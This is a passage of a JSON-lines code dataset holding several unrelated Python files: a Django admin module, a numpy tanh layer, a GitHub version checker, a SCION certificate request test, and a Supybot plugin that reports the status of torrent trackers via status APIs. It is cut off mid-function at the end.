)\n str_values += ['%s' % (change_url, escape(x))]\n except self.rel.to.DoesNotExist:\n str_values += [u'???']\n return u', '.join(str_values)\n\n#################################################\n### Entità di base\n#################################################\nclass CommonAdmin(admin.ModelAdmin):\n save_on_top = True\n list_display = ('__unicode__','ord',)\n search_fields = ('name',)\n fieldsets = (\n (None, {\n 'fields': (('name','ord',),)\n }),\n ('Descrizione', {\n 'fields': ('descr',),\n }),\n )\n\n def formfield_for_dbfield(self, db_field, **kwargs):\n u\"\"\"\n For \"descr_XX\" fields, use a suitably large textarea widget\n \"\"\"\n formfield = super(CommonAdmin, self).formfield_for_dbfield(db_field, **kwargs)\n if db_field.name.startswith('descr'):\n attrs = formfield.widget.attrs or {}\n attrs.update({'cols': '80', 'rows': '10', 'style': 'width: 80em;'}) \n formfield.widget = forms.Textarea(attrs=attrs)\n \n #see: http://djangosnippets.org/snippets/2217/\n if db_field.name in self.raw_id_fields:\n kwargs.pop(\"request\", None)\n reltype = db_field.rel.__class__.__name__\n if reltype == \"ManyToOneRel\":\n formfield.widget = VerboseForeignKeyRawIdWidget(db_field.rel, self.admin_site)\n elif reltype == \"ManyToManyRel\":\n formfield.widget = VerboseManyToManyRawIdWidget(db_field.rel, self.admin_site)\n return formfield \n\n#################################################\nclass DataContainerAdmin(CommonAdmin):\n list_display = CommonAdmin.list_display + ('url',)\n fieldsets = CommonAdmin.fieldsets + (\n (None, {\n 'fields': ('url',)\n }),\n ) \nadmin.site.register(DataContainer,DataContainerAdmin)\n\n#################################################\nclass DataTaskInline(admin.TabularInline):\n model = getattr(Data.dependencies,'through') #avoid PyDev error for Soggetto.dependencies.through \n fk_name = 'data'\n extra = 0 #nessun record già pronto per la aggiunta\n max_num = None #consente aggiunta di infiniti record inline\n fields = ('dep','task','ord',)\n raw_id_fields = ('dep',)\n \n#################################################\nclass DataAdmin(CommonAdmin):\n list_display = CommonAdmin.list_display\n list_filter = ('container',)\n inlines = [DataTaskInline]\n fieldsets = (\n (None, {\n 'fields': ('container',)\n }),\n ) + CommonAdmin.fieldsets \nadmin.site.register(Data,DataAdmin)\n","sub_path":"dataman/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":4358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"340135795","text":"import numpy as np\nimport copy\n\n# tanh function\ndef tanh(trigger):\n\treturn (np.exp(trigger)-np.exp(-trigger))/(np.exp(trigger)+np.exp(-trigger))\n\n# class of tanh layer\nclass TanhLayer(object):\n\tdef __init__(self,num_input,num_output):\n\t# example: TanhLayer(dimension of input data,dimension of output data)\n\t\tself.num_input = num_input\n\t\tself.num_output = num_output\n\t\tself.num_layer = 1\n\t\tself.theta = [np.asarray(\n\t\t\tnp.random.normal(0,np.sqrt(1.0/float(self.num_output)),[self.num_output,self.num_input]),\n\t\t\tdtype='float')]\n\t\tself.bias = [np.asarray(\n\t\t\tnp.random.normal(0,np.sqrt(1.0/float(self.num_output)),self.num_output),\n\t\t\tdtype='float')]\n\t\tself.d_theta = [np.zeros([self.num_output,self.num_input],dtype='float')]\n\t\tself.d_bias = [np.zeros(self.num_output,dtype='float')]\n\t\tself.delta = []\n\t\tself.trigger = []\n\t\tself.activation = []\n\t\t# gradient check\n\t\tself.theta_check = []\n\t\tself.bias_check = []\n\t\n\t# 
copy parameters for gradient check\n\tdef cloneParameter(self):\n\t# example: cloneParameter()\n\t\tself.theta_check = copy.deepcopy(self.theta)\n\t\tself.bias_check = copy.deepcopy(self.bias)\n\t# calculate output of current without affecting activation or trigger\n\tdef pseudoForward(self,val_input):\n\t# example: pseudoForward(input data)\n\t\ttrigger = [] \n\t\tactivation = []\n\t\ttrigger.extend([np.dot(self.theta_check[0],val_input)+self.bias_check[0]])\n\t\tactivation.extend([tanh(trigger[0])])\n\t\treturn activation[self.num_layer-1]\n\n\t# calculate activation of current layer\n\tdef forward(self,val_input):\n\t# example: forward(input data)\n\t\tself.trigger = [] # reset trigger value\n\t\tself.activation = [] #reset activation\n\t\tself.trigger.extend([np.dot(self.theta[0],val_input)+self.bias[0]])\n\t\tself.activation.extend([tanh(self.trigger[0])])\n\t\n\t# get activation of current layer\n\tdef getActivation(self):\n\t# example: getActivation()\n\t\treturn self.activation[self.num_layer-1]\n\n\t# calculate derivative of parameters in current layer\n\tdef backward(self,error,val_input,check_layer=0):\n\t# example: backward(derivative with respect to activation,input data,gradient check on/off)\n\t\t# derivative with respect to trigger\n\t\terror = error * 4/(np.exp(self.trigger[0])+np.exp(-self.trigger[0]))**2\n\t\tself.delta = [] # reset error\n\t\tself.delta.extend([error])\n\t\t# accumulate derivative\n\t\tself.d_theta[0] += np.outer(self.delta[0],val_input)\n\t\tself.d_bias[0] += self.delta[0]\n\t\t# display derivative of parameters in current layer for gradient check\n\t\tif check_layer>0:\n\t\t\tprint('backpropagate derivative theta in layer'+str(check_layer)+':')\n\t\t\tprint(np.outer(self.delta[0],val_input))\n\t\t\tprint('backpropagate derivative bias in layer '+str(check_layer)+':')\n\t\t\tprint(self.delta[0])\n\n\t# calculate error for previous layer\n\tdef getPreError(self):\n\t# example: getPreError()\n\t\treturn np.dot(self.theta[0].T,self.delta[0])\n\n\t# regularization\n\tdef regularization(self,C):\n\t# example: regularization(regularization weight)\n\t\tself.d_theta[0] += C * self.theta[0]\n\t\tself.d_bias[0] += C * self.bias[0]\n\n\t# update parameters\n\tdef update(self,rate,batch):\n\t# example: update(learning rate,batch size)\n\t\tself.theta[0] -= rate*self.d_theta[0]/float(batch)\n\t\tself.bias[0] -= rate*self.d_bias[0]/float(batch)\n\n\t# reset derivative of theta and bias\n\tdef resetDerivative(self):\n\t# example: resetDerivative()s\n\t\tself.d_theta = []\n\t\tself.d_bias = []\n\t\tself.d_theta.extend([np.zeros([self.num_output,self.num_input],dtype='float')])\n\t\tself.d_bias.extend([np.zeros(self.num_output,dtype='float')])\n\n\t# display information of current layer\n\tdef show(self):\n\t# example: show()\n\t\tprint('tanh layer')\n\t\tprint('---------------------------------------')\n\t\tprint('number of layer: '+str(self.num_layer))\n\t\tprint('number of input: '+str(self.num_input))\n\t\tprint('number of output: '+str(self.num_output))\n\n\n\n\n\t\t","sub_path":"neural/tanh_layer.py","file_name":"tanh_layer.py","file_ext":"py","file_size_in_byte":3771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"362010384","text":"#coding=utf-8\n# 处理中文\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\ndef get_brand(collection1, collection2, comment):\n # 搜索商品id\n for item1 in collection1.find({\"content\":comment}):\n product_id = item1[\"product_id\"]\n for item2 in 
collection2.find({\"product_id\": str(product_id)}):\n brand_id = item2[\"brand_name\"]\n return brand_id","sub_path":"get_brand.py","file_name":"get_brand.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"492036136","text":"#!/usr/bin/env python3\n\n# Just testing out how to access github from python\n\nimport urllib.request\nimport urllib\nfrom vpv import __version__\nimport socket\n\ndef get_latest_github_version():\n\n socket.setdefaulttimeout(4)\n try:\n response = urllib.request.urlopen('https://github.com/mpi2/vpv/releases/latest', timeout=4)\n except (urllib.request.URLError, IOError):\n print('timed out')\n return False\n\n resolves_to = response.url\n latest_version = resolves_to.split('/')[-1].strip('v')\n\n current_version = __version__\n\n if current_version < latest_version:\n return resolves_to\n else:\n return False\n","sub_path":"vpv/utils/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"603605396","text":"#!/usr/bin/python3\n# Copyright 2016 ETH Zurich\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"\n:mod:`cert_req_est` --- SCION certificate request tests\n=======================================================\n\"\"\"\n\n# Stdlib\nimport logging\nimport threading\n\n# SCION\nimport lib.app.sciond as lib_sciond\nfrom lib.main import main_wrapper\nfrom lib.packet.ctrl_pld import CtrlPayload\nfrom lib.packet.cert_mgmt import CertChainRequest, CertMgmt, TRCRequest\nfrom lib.packet.path import SCIONPath\nfrom lib.packet.scion import SCIONL4Packet, build_base_hdrs\nfrom lib.packet.scion_addr import SCIONAddr\nfrom lib.types import ServiceType\nfrom integration.base_cli_srv import (\n get_sciond_api_addr,\n setup_main,\n ResponseRV,\n TestClientBase,\n TestClientServerBase,\n)\n\n\nclass TestCertClient(TestClientBase):\n def __init__(self, finished, addr, dst_ia):\n # We need the lib sciond here already.\n connector = lib_sciond.init(get_sciond_api_addr(addr))\n cs_info = lib_sciond.get_service_info(\n [ServiceType.CS], connector=connector)[ServiceType.CS]\n cs = cs_info.host_info(0)\n cs_addr = SCIONAddr.from_values(addr.isd_as, cs.ipv4() or cs.ipv6())\n self.cert = None\n super().__init__(\"\", finished, addr, cs_addr, cs.p.port, retries=2)\n self.dst_ia = dst_ia\n\n def _get_path(self, api, flush=None):\n pass # No path required. 
All queries go to local CS\n\n def _build_pkt(self):\n cmn_hdr, addr_hdr = build_base_hdrs(self.dst, self.addr)\n l4_hdr = self._create_l4_hdr()\n spkt = SCIONL4Packet.from_values(\n cmn_hdr, addr_hdr, SCIONPath(), [], l4_hdr)\n spkt.set_payload(self._create_payload(spkt))\n spkt.update()\n return spkt\n\n def _create_payload(self, _):\n if not self.cert:\n return CtrlPayload(CertMgmt(CertChainRequest.from_values(self.dst_ia, 0)))\n return CtrlPayload(CertMgmt(TRCRequest.from_values(self.dst_ia, 0)))\n\n def _handle_response(self, spkt):\n cpld = spkt.parse_payload()\n cmgt = cpld.union\n pld = cmgt.union\n logging.debug(\"Got:\\n%s\", spkt)\n if not self.cert:\n if (self.dst_ia, 0) == pld.chain.get_leaf_isd_as_ver():\n logging.debug(\"Cert query success\")\n self.cert = pld.chain\n return ResponseRV.CONTINUE\n logging.error(\"Cert query failed\")\n return ResponseRV.FAILURE\n if (self.dst_ia[0], 0) == pld.trc.get_isd_ver():\n self.cert.verify(str(self.dst_ia), pld.trc)\n logging.debug(\"TRC query success\")\n self.success = True\n self.finished.set()\n return ResponseRV.SUCCESS\n logging.error(\"TRC query failed\")\n return ResponseRV.FAILURE\n\n\nclass TestCertReq(TestClientServerBase):\n NAME = \"CertReqTest\"\n\n def _run_test(self, src, dst):\n logging.info(\"Testing: %s -> %s\", src.isd_as, dst.isd_as)\n finished = threading.Event()\n client = self._create_client(finished, src, dst.isd_as)\n client.run()\n if client.success:\n return True\n logging.error(\"Client success? %s\", client.success)\n return False\n\n def _create_client(self, finished, addr, dst_ia):\n return TestCertClient(finished, addr, dst_ia)\n\n\ndef main():\n args, srcs, dsts = setup_main(\"certreq\")\n TestCertReq(args.client, args.server, srcs, dsts, max_runs=args.runs).run()\n\n\nif __name__ == \"__main__\":\n main_wrapper(main)\n","sub_path":"python/integration/cert_req_test.py","file_name":"cert_req_test.py","file_ext":"py","file_size_in_byte":4014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"63251207","text":"###\n# Copyright (c) 2017, Ormanya\n# Copyright (c) 2020, oddluck \n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice,\n# this list of conditions, and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions, and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of the author of this software nor the name of\n# contributors to this software may be used to endorse or promote products\n# derived from this software without specific prior written consent.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n###\n\nimport supybot.plugins as plugins\nfrom supybot.commands import *\nimport supybot.ircutils as ircutils\nimport supybot.callbacks as callbacks\nimport requests\nimport json\nimport sys\nimport re\n\nimport supybot.schedule as schedule\nfrom datetime import datetime\n\n\nstatus_commands = [\n \"btnStatus\",\n \"redStatus\",\n \"mtvStatus\",\n \"nwcdStatus\",\n \"ptpStatus\",\n \"ggnStatus\",\n \"arStatus\",\n \"p32Status\",\n \"ahdStatus\",\n \"ahdStatus\",\n \"empStatus\",\n \"nblStatus\",\n]\nstatus_trackers = [\n \"btn\",\n \"red\",\n \"mtv\",\n \"nwcd\",\n \"ptp\",\n \"ggn\",\n \"ar\",\n \"p32\",\n \"ahd\",\n \"ahd\",\n \"emp\",\n \"nbl\",\n]\n\n\nclass WebParser:\n \"\"\"Contains functions for getting and parsing web data\"\"\"\n\n def getWebData(self, irc, url):\n headers = {\n \"User-Agent\": (\n \"Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko)\"\n \" Chrome/24.0.1312.27 Safari/537.17\"\n )\n }\n try:\n content = requests.get(url, headers=headers, timeout=10)\n content = json.loads(content.content)\n return content\n except:\n irc.reply(\"Error: Couldn't connect to \" + url)\n return\n\n def prepareStatusString(\n self, site_name, status, status_headers, breakpoints, line_headers\n ):\n # Specify look and feel\n status_states = [\"Down\", \"Up\", \"Iffy\", \"Mean\"]\n status_symbols = [\"Ⓧ\", \"✓\", \"◯\", \"💩\"]\n status_colours = [chr(3) + \"04\", chr(3) + \"09\", chr(3) + \"07\", chr(3) + \"13\"]\n\n # Prepare output status message\n outStr = [line_headers[0]]\n count = 0\n line = 0\n for element in status:\n count = count + 1\n i = int(element)\n\n outStr[line] = (\n outStr[line]\n + status_colours[i]\n + status_symbols[i]\n + \" \"\n + status_headers[count - 1]\n + \" \"\n + status_states[i]\n )\n\n # Split output at breakpoints\n if count in breakpoints:\n line = line + 1\n outStr.extend([line_headers[line]])\n # don't append \"|\" if end of line\n elif count != len(status):\n outStr[line] = outStr[line] + chr(15) + \" | \"\n return outStr\n\n\nclass Trackers(callbacks.Plugin):\n \"\"\"Contains commands for checking server status of various trackers.\"\"\"\n\n threaded = True\n\n # def __init__(self, irc):\n # print \"Setting it up\"\n\n # self.__parent = super(Trackers, self)\n # self.__parent.__init__(irc)\n # # Set scheduler variables\n\n # # Schedule announce check\n # # Check if event already exists\n # try:\n # schedule.removeEvent('statusAnnounce')\n # except KeyError:\n # pass\n\n # def myEventCaller():\n # print \"Scheduling announce\"\n # self.autoAnnounce(irc)\n\n # schedule.addPeriodicEvent(myEventCaller, 30, 'statusAnnounce')\n # self.irc = irc\n\n # print \"All done\"\n\n def formatTimeSince(self, interval):\n # seconds\n if (interval.days == 0) and (interval.seconds < 60):\n time_passed = \"%s seconds ago\" % interval.seconds\n # minutes\n elif interval.days == 0 and interval.seconds < 3600:\n if interval.seconds < 120:\n time_passed = \"1 minute ago\"\n else:\n time_passed = \"%s minutes ago\" % 
int(interval.seconds / 60)\n # hours\n elif interval.days == 0:\n if interval.seconds < 7200:\n time_passed = \"1 hour ago\"\n else:\n time_passed = \"%s hours ago\" % int(interval.seconds / 3600)\n # days\n elif interval.days < 7:\n if interval.days == 1:\n time_passed = \"1 day ago\"\n else:\n time_passed = \"%s days ago\" % interval.days\n # weeks\n else:\n if interval.days < 14:\n time_passed = \"1 week ago\"\n else:\n time_passed = \"%s weeks ago\" % int(interval.days / 7)\n\n return time_passed\n\n def btnStatus(self, irc, msg, args, opts):\n \"\"\"[--message]\n\n Check the status of BTN site, tracker, and irc. Use --message flag to force return of message, even if older than 24 hours.\n \"\"\"\n url = \"https://btn.trackerstatus.info/api/status/\"\n site_name = \"BTN\"\n\n content = WebParser().getWebData(irc, url)\n\n status = [\n content[\"Website\"],\n content[\"API\"],\n content[\"TrackerHTTP\"],\n content[\"TrackerHTTPS\"],\n content[\"IRC\"],\n content[\"CableGuy\"],\n content[\"Barney\"],\n 3,\n ]\n status_headers = [\n \"Site\",\n \"API\",\n \"Tracker\",\n \"Tracker SSL\",\n \"IRC\",\n \"IRC Id\",\n \"IRC Announce\",\n \"kenyz\",\n ]\n breakpoints = [0]\n line_headers = [\"\"]\n\n outStr = WebParser().prepareStatusString(\n site_name, status, status_headers, breakpoints, line_headers\n )\n\n for i in range(0, len(outStr)):\n irc.reply(outStr[i])\n\n # Output message if --message flag specified or newer than 1 day\n interval = datetime.now() - datetime.fromtimestamp(\n float(content[\"tweet\"][\"unix\"])\n )\n if opts == \"--message\" or interval.days < 1:\n message_string = content[\"tweet\"][\"message\"]\n time_string = self.formatTimeSince(interval)\n\n outstr = \"%s message: %s (%s)\" % (site_name, message_string, time_string)\n irc.reply(outstr)\n\n btn = wrap(btnStatus, [optional(\"something\")])\n\n def redStatus(self, irc, msg, args, opts):\n \"\"\"[--message]\n\n Check the status of Redacted site, tracker, and irc. Use --message flag to force return of message, even if older than 24 hours.\n \"\"\"\n url = \"http://red.trackerstatus.info/api/status/\"\n site_name = \"RED\"\n\n content = WebParser().getWebData(irc, url)\n\n status = [\n content[\"Website\"],\n content[\"TrackerHTTP\"],\n content[\"TrackerHTTPS\"],\n content[\"IRC\"],\n content[\"IRCTorrentAnnouncer\"],\n content[\"IRCUserIdentifier\"],\n ]\n status_headers = [\n site_name + \" Site\",\n \"Tracker\",\n \"Tracker SSL\",\n \"IRC\",\n \"IRC Announce\",\n \"IRC ID\",\n ]\n breakpoints = [0]\n line_headers = [\"\"]\n\n outStr = WebParser().prepareStatusString(\n site_name, status, status_headers, breakpoints, line_headers\n )\n\n for i in range(0, len(outStr)):\n irc.reply(outStr[i])\n\n # Output message if --message flag specified or newer than 1 day\n interval = datetime.now() - datetime.fromtimestamp(\n float(content[\"tweet\"][\"unix\"])\n )\n if opts == \"--message\" or interval.days < 1:\n message_string = content[\"tweet\"][\"message\"]\n time_string = self.formatTimeSince(interval)\n\n outstr = \"%s message: %s (%s)\" % (site_name, message_string, time_string)\n irc.reply(outstr)\n\n red = wrap(redStatus, [optional(\"something\")])\n\n def opsStatus(self, irc, msg, args, opts):\n \"\"\"[--message]\n\n Check the status of Orpheus site, tracker, and irc. 
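Editor's note: formatTimeSince above buckets a timedelta into a coarse human-readable string (seconds, minutes, hours, days, weeks, each with a singular special case). A few spot checks, one per branch; since self is unused by the method, it can be exercised through the class for illustration on Python 3 (inside supybot the plugin would of course be constructed normally, with a live irc object):

from datetime import timedelta

Trackers.formatTimeSince(None, timedelta(seconds=45))  # '45 seconds ago'
Trackers.formatTimeSince(None, timedelta(seconds=90))  # '1 minute ago'
Trackers.formatTimeSince(None, timedelta(hours=3))     # '3 hours ago'
Trackers.formatTimeSince(None, timedelta(days=10))     # '1 week ago'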
Use --message flag to force return of message, even if older than 24 hours.\n \"\"\"\n url = \"http://ops.trackerstatus.info/api/status/\"\n site_name = \"OPS\"\n\n content = WebParser().getWebData(irc, url)\n\n status = [\n content[\"Website\"],\n content[\"TrackerHTTP\"],\n content[\"TrackerHTTPS\"],\n content[\"IRC\"],\n content[\"IRCTorrentAnnouncer\"],\n content[\"IRCUserIdentifier\"],\n ]\n status_headers = [\n site_name + \" Site\",\n \"Tracker\",\n \"Tracker SSL\",\n \"IRC\",\n \"IRC Announce\",\n \"IRC ID\",\n ]\n breakpoints = [0]\n line_headers = [\"\"]\n\n outStr = WebParser().prepareStatusString(\n site_name, status, status_headers, breakpoints, line_headers\n )\n\n for i in range(0, len(outStr)):\n irc.reply(outStr[i])\n\n # Output message if --message flag specified or newer than 1 day\n interval = datetime.now() - datetime.fromtimestamp(\n float(content[\"tweet\"][\"unix\"])\n )\n if opts == \"--message\" or interval.days < 1:\n message_string = content[\"tweet\"][\"message\"]\n time_string = self.formatTimeSince(interval)\n\n outstr = \"%s message: %s (%s)\" % (site_name, message_string, time_string)\n irc.reply(outstr)\n\n ops = wrap(opsStatus, [optional(\"something\")])\n\n def mtvStatus(self, irc, msg, args, opts):\n \"\"\"\n Check the status of MTV site, tracker, and irc. Use --message flag to force return of message, even if older than 24 hours.\n \"\"\"\n url = \"http://mtv.trackerstatus.info/api/status/\"\n site_name = \"MTV\"\n\n content = WebParser().getWebData(irc, url)\n\n status = [\n content[\"Website\"],\n content[\"TrackerHTTP\"],\n content[\"TrackerHTTPS\"],\n content[\"IRC\"],\n content[\"IRCTorrentAnnouncer\"],\n content[\"IRCUserIdentifier\"],\n ]\n status_headers = [\n site_name + \" Site\",\n \"Tracker\",\n \"Tracker SSL\",\n \"IRC\",\n \"IRC Announce\",\n \"IRC ID\",\n ]\n breakpoints = [0]\n line_headers = [\"\"]\n\n outStr = WebParser().prepareStatusString(\n site_name, status, status_headers, breakpoints, line_headers\n )\n\n for i in range(0, len(outStr)):\n irc.reply(outStr[i])\n\n # Output message if --message flag specified or newer than 1 day\n interval = datetime.now() - datetime.fromtimestamp(\n float(content[\"tweet\"][\"unix\"])\n )\n if opts == \"--message\" or interval.days < 1:\n message_string = content[\"tweet\"][\"message\"]\n time_string = self.formatTimeSince(interval)\n\n outstr = \"%s message: %s (%s)\" % (site_name, message_string, time_string)\n irc.reply(outstr)\n\n mtv = wrap(mtvStatus, [optional(\"something\")])\n\n def nwcdStatus(self, irc, msg, args, opts):\n \"\"\"\n Check the status of NWCD site, tracker, and irc. 
Use --message flag to force return of message, even if older than 24 hours.\n \"\"\"\n url = \"http://nwcd.trackerstatus.info/api/status/\"\n site_name = \"NWCD\"\n\n content = WebParser().getWebData(irc, url)\n\n status = [\n content[\"Website\"],\n content[\"TrackerHTTP\"],\n content[\"TrackerHTTPS\"],\n content[\"IRC\"],\n content[\"IRCTorrentAnnouncer\"],\n content[\"IRCUserIdentifier\"],\n content[\"ImageHost\"],\n ]\n status_headers = [\n site_name + \" Site\",\n \"Tracker\",\n \"Tracker SSL\",\n \"IRC\",\n \"IRC Announce\",\n \"IRC ID\",\n \"Image Host\",\n ]\n breakpoints = [0]\n line_headers = [\"\"]\n\n outStr = WebParser().prepareStatusString(\n site_name, status, status_headers, breakpoints, line_headers\n )\n\n for i in range(0, len(outStr)):\n irc.reply(outStr[i])\n\n # Output message if --message flag specified or newer than 1 day\n interval = datetime.now() - datetime.fromtimestamp(\n float(content[\"tweet\"][\"unix\"])\n )\n if opts == \"--message\" or interval.days < 1:\n message_string = content[\"tweet\"][\"message\"]\n time_string = self.formatTimeSince(interval)\n\n outstr = \"%s message: %s (%s)\" % (site_name, message_string, time_string)\n irc.reply(outstr)\n\n nwcd = wrap(nwcdStatus, [optional(\"something\")])\n\n def ptpStatus(self, irc, msg, args, opts):\n \"\"\"\n Check the status of PTP site, tracker, and irc. Use --message flag to force return of message, even if older than 24 hours.\n \"\"\"\n url = \"https://ptp.trackerstatus.info/api/status/\"\n site_name = \"PTP\"\n\n content = WebParser().getWebData(irc, url)\n\n status = [\n content[\"Website\"],\n content[\"IRCTorrentAnnouncer\"],\n content[\"IRCUserIdentifier\"],\n content[\"TrackerHTTPAddresses\"][\"51.255.35.90\"],\n content[\"TrackerHTTPAddresses\"][\"164.132.51.73\"],\n content[\"TrackerHTTPAddresses\"][\"164.132.54.181\"],\n content[\"TrackerHTTPAddresses\"][\"164.132.54.182\"],\n content[\"TrackerHTTPAddresses\"][\"192.99.58.220\"],\n content[\"IRC\"],\n ]\n status_headers = [\n site_name + \" Site\",\n \"IRC Announce\",\n \"IRC ID\",\n \"51.255.35.90\",\n \"164.132.51.73\",\n \"164.132.54.181\",\n \"164.132.54.182\",\n \"192.99.58.220\",\n \"Persona\",\n ]\n breakpoints = [3]\n line_headers = [\"Services: \", \"Trackers: \"]\n\n outStr = WebParser().prepareStatusString(\n site_name, status, status_headers, breakpoints, line_headers\n )\n\n for i in range(0, len(outStr)):\n irc.reply(outStr[i])\n\n # Output message if --message flag specified or newer than 1 day\n interval = datetime.now() - datetime.fromtimestamp(\n float(content[\"tweet\"][\"unix\"])\n )\n if opts == \"--message\" or interval.days < 1:\n message_string = content[\"tweet\"][\"message\"]\n time_string = self.formatTimeSince(interval)\n\n outstr = \"%s message: %s (%s)\" % (site_name, message_string, time_string)\n irc.reply(outstr)\n\n ptp = wrap(ptpStatus, [optional(\"something\")])\n\n def ggnStatus(self, irc, msg, args, opts):\n \"\"\"\n Check the status of GGN site, tracker, and irc. 
Use --message flag to force return of message, even if older than 24 hours.\n \"\"\"\n url = \"https://ggn.trackerstatus.info/api/status/\"\n site_name = \"GGn\"\n\n content = WebParser().getWebData(irc, url)\n\n status = [\n content[\"Website\"],\n content[\"TrackerHTTP\"],\n content[\"TrackerHTTPS\"],\n content[\"IRC\"],\n content[\"IRCTorrentAnnouncer\"],\n content[\"IRCUserIdentifier\"],\n ]\n status_headers = [\n site_name + \" Site\",\n \"Tracker\",\n \"TrackerSSL\",\n \"IRC\",\n \"IRC Announce\",\n \"IRC ID\",\n ]\n breakpoints = [0]\n line_headers = [\"\"]\n\n outStr = WebParser().prepareStatusString(\n site_name, status, status_headers, breakpoints, line_headers\n )\n\n for i in range(0, len(outStr)):\n irc.reply(outStr[i])\n\n # Output message if --message flag specified or newer than 1 day\n interval = datetime.now() - datetime.fromtimestamp(\n float(content[\"tweet\"][\"unix\"])\n )\n if opts == \"--message\" or interval.days < 1:\n message_string = content[\"tweet\"][\"message\"]\n time_string = self.formatTimeSince(interval)\n\n outstr = \"%s message: %s (%s)\" % (site_name, message_string, time_string)\n irc.reply(outstr)\n\n ggn = wrap(ggnStatus, [optional(\"something\")])\n\n def arStatus(self, irc, msg, args, opts):\n \"\"\"\n Check the status of AR site, tracker, and irc. Use --message flag to force return of message, even if older than 24 hours.\n \"\"\"\n url = \"http://ar.trackerstatus.info/api/status/\"\n site_name = \"AR\"\n\n content = WebParser().getWebData(irc, url)\n\n status = [\n content[\"Website\"],\n content[\"TrackerHTTP\"],\n content[\"TrackerHTTPS\"],\n content[\"IRC\"],\n content[\"IRCTorrentAnnouncer\"],\n content[\"IRCUserIdentifier\"],\n ]\n status_headers = [\n site_name + \" Site\",\n \"Tracker\",\n \"Tracker SSL\",\n \"IRC\",\n \"IRC Announce\",\n \"IRC ID\",\n ]\n breakpoints = [0]\n line_headers = [\"\"]\n\n outStr = WebParser().prepareStatusString(\n site_name, status, status_headers, breakpoints, line_headers\n )\n\n for i in range(0, len(outStr)):\n irc.reply(outStr[i])\n\n # Output message if --message flag specified or newer than 1 day\n interval = datetime.now() - datetime.fromtimestamp(\n float(content[\"tweet\"][\"unix\"])\n )\n if opts == \"--message\" or interval.days < 1:\n message_string = content[\"tweet\"][\"message\"]\n time_string = self.formatTimeSince(interval)\n\n outstr = \"%s message: %s (%s)\" % (site_name, message_string, time_string)\n irc.reply(outstr)\n\n ar = wrap(arStatus, [optional(\"something\")])\n\n def p32Status(self, irc, msg, args, opts):\n \"\"\"\n Check the status of AR site, tracker, and irc. 
Use --message flag to force return of message, even if older than 24 hours.\n \"\"\"\n url = \"http://32p.trackerstatus.info/api/status/\"\n site_name = \"32p\"\n\n content = WebParser().getWebData(irc, url)\n\n status = [\n content[\"Website\"],\n content[\"TrackerHTTP\"],\n content[\"IRC\"],\n content[\"IRCTorrentAnnouncer\"],\n content[\"IRCUserIdentifier\"],\n ]\n status_headers = [\n site_name + \" Site\",\n \"Tracker\",\n \"IRC\",\n \"IRC Announce\",\n \"IRC ID\",\n ]\n breakpoints = [0]\n line_headers = [\"\"]\n\n outStr = WebParser().prepareStatusString(\n site_name, status, status_headers, breakpoints, line_headers\n )\n\n for i in range(0, len(outStr)):\n irc.reply(outStr[i])\n\n # Output message if --message flag specified or newer than 1 day\n interval = datetime.now() - datetime.fromtimestamp(\n float(content[\"tweet\"][\"unix\"])\n )\n if opts == \"--message\" or interval.days < 1:\n message_string = content[\"tweet\"][\"message\"]\n time_string = self.formatTimeSince(interval)\n\n outstr = \"%s message: %s (%s)\" % (site_name, message_string, time_string)\n irc.reply(outstr)\n\n p32 = wrap(p32Status, [optional(\"something\")])\n\n def ahdStatus(self, irc, msg, args, all):\n \"\"\"\n Check the status of AHD site, tracker, and irc.\n \"\"\"\n\n # This function is different than the others because it scrapes HTML rather than use an api site\n url = \"https://status.awesome-hd.me\"\n site_name = \"AHD\"\n\n # Get web page content\n headers = {\n \"User-Agent\": (\n \"Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko)\"\n \" Chrome/24.0.1312.27 Safari/537.17\"\n )\n }\n try:\n content = requests.get(url, headers=headers)\n except:\n irc.reply(\"Error: Couldn't connect to \" + url)\n return\n\n # Extract statuses\n status_txt = re.search(\n r'.*Site.*2x\\ 